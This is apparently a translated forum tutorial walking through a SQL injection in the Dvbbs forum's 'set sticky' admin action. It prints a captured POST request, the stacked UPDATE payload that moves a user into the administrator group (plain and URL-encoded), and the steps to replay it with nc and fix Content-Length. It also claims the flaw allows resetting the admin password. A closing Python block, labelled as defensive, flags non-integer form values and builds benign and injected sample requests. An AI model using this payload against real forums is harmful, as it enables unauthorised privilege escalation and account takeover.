Let the Internet go to hell again

Source: Internet
Author: User
First, look for a board without pinned posts. Can a forum really have no pinned posts at all? Click in and check whether there is a pinned post. I set up my own platform for testing. Of course, the conditions of the vulnerability must be met: in the earlier case, the moderator did not have to be logged in as a front-end moderator; you only need to be able to pin a post. Post something casually, then click Set Sticky (Figure 1).

Pin it to the top in normal mode (Figure 2).

At this point we pause and open the WSE packet-capture tool to capture the submitted post information. With the tool running, click OK. Now let's see what WSE caught (Figure 3).

The intercepted submission is copied out; its content is as follows:
POST /SQL/admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.254/SQL/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; TencentTraveler ; .NET CLR 1.1.4322)
Host: 192.168.1.254
Content-Length: 133
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 192%2e168%2e1%2e254%2fsql%2f=userid=1&usercookies=0&password=9pb621664s5w7il7&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&statuserid=1929167667; ASPSESSIONIDCATQTATT=JJGHMOMDLJJAAFHAGMLGOMIL; ASPSESSIONIDACTTRATS=NMLHLBBAPMOIEGAIBMBFOIMH; dvbbs=; upnum=0

istopaction=1&boardid=1&id=1&title=&content=a&dowealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7

What do we do now? Change getboard to ");update [dv_user] set usergroupid=1 where userid=2;--". It has to be converted to encoded form first; use encoder.exe under cmd to convert it. The conversion result is as follows: %31%2C%31%3B%29%75%70%64%61%5B%74%5f%65%20%64%76%5d%75%73%65%72%20%73%65%74%20%75%73%65%72%6f%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%20
Replace getboard=1 with the injection statement. This statement promotes the user with userid 2 to the administrator group, though only as a front-end administrator. Then count the characters added and change the value of Content-Length accordingly; I was too lazy to count and just changed it to 250. Submit the modified request with nc (Figure 4).

The idea is to feed the contents of a.txt to nc; the response that comes back is saved to 1.htm.

Open the 1.htm we got back.

Syntax error? Do you know why? As I mentioned earlier, I did not count the Content-Length properly, so the statement was only executed up to ");update [dv_user] set usergroupid=1 where user" and never ran in full; a syntax error is to be expected, right? Since the length does not need to be exact, we can add a few more to the Content-Length and change it. Then we resubmit and look at the output returned in 1.htm (Figure 6).
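As an added defender-side example (not code from the article), the check below parses a request shaped like the capture above, honours Content-Length the way the server does, and flags form fields such as getboard whose value is not a plain integer; the minimal request, the trimmed bodies and the field names are assumptions taken from the captured request, not from the Dvbbs source.

```python
import re
from urllib.parse import unquote_to_bytes

# Fields of the "set sticky" form that should only ever hold integers. Assumption:
# the names come from the request captured above, not from the Dvbbs source.
INT_PARAMS = {"istopaction", "boardid", "id", "getboard", "dowealth", "dousercp", "douserep"}

def parse_request(raw: bytes):
    """Split a raw HTTP request into (request line, headers, body), keeping only
    Content-Length bytes of the body as the server does: the rest is cut off."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    length = int(headers.get("content-length", "0"))
    return lines[0].decode("latin-1"), headers, rest[:length]

def parse_form(body: bytes) -> dict:
    """URL-decode an x-www-form-urlencoded body. Values are decoded as GBK, the
    charset of the captured Dvbbs form (submit=%C8%B7... is GBK text)."""
    params = {}
    for pair in body.split(b"&"):
        key, _, value = pair.partition(b"=")
        key = unquote_to_bytes(key).decode("latin-1").lower()
        params[key] = unquote_to_bytes(value.replace(b"+", b" ")).decode("gbk", "replace")
    return params

def audit_istop_request(raw: bytes) -> list:
    """One finding per integer-only field whose value is not a plain integer;
    such a value is what reaches the SQL text unchanged in the vulnerable page."""
    _, _, body = parse_request(raw)
    params = parse_form(body)
    return ["%s: expected an integer, got %r" % (name, params[name])
            for name in sorted(INT_PARAMS & set(params))
            if not re.fullmatch(r"\d+", params[name])]

def build_request(body: bytes, content_length: int) -> bytes:
    """Constructed sample request with minimal headers, shaped like the capture."""
    return (b"POST /SQL/admin_postings.asp?action=istop HTTP/1.1\r\n"
            b"Host: 192.168.1.254\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: %d\r\n\r\n" % content_length) + body

# Constructed bodies: the benign pin request (trimmed) and the same body with
# getboard carrying the stacked UPDATE quoted in the article.
BENIGN = b"istopaction=1&boardid=1&id=1&title=&content=a&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7"
INJECTED = BENIGN.replace(b"getboard=1", b"getboard=1%29%3Bupdate%20%5Bdv_user%5D"
                          b"%20set%20usergroupid%3D1%20where%20userid%3D2%3B--")
```

Running the audit on a request whose Content-Length is declared too short shows the same truncation the article hit: the body is cut mid-statement before the form is even decoded, which is why an under-counted length produced a syntax error rather than a silent success.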

Hmm? "Operation successful." The injection statement has executed. Let's see whether the user with userid=2 has become an administrator. The user with userid=2 is 619054; to save trouble, I checked directly in the back end whether this user's permission is administrator (Figure 7).


Haha, it really has been upgraded to administrator. This vulnerability can not only promote a user from ordinary permissions to administrator, but also directly change the back-end administrator's password. Serious enough? No patch has been released for the official Dvbbs (动网) forum. Really depressing.
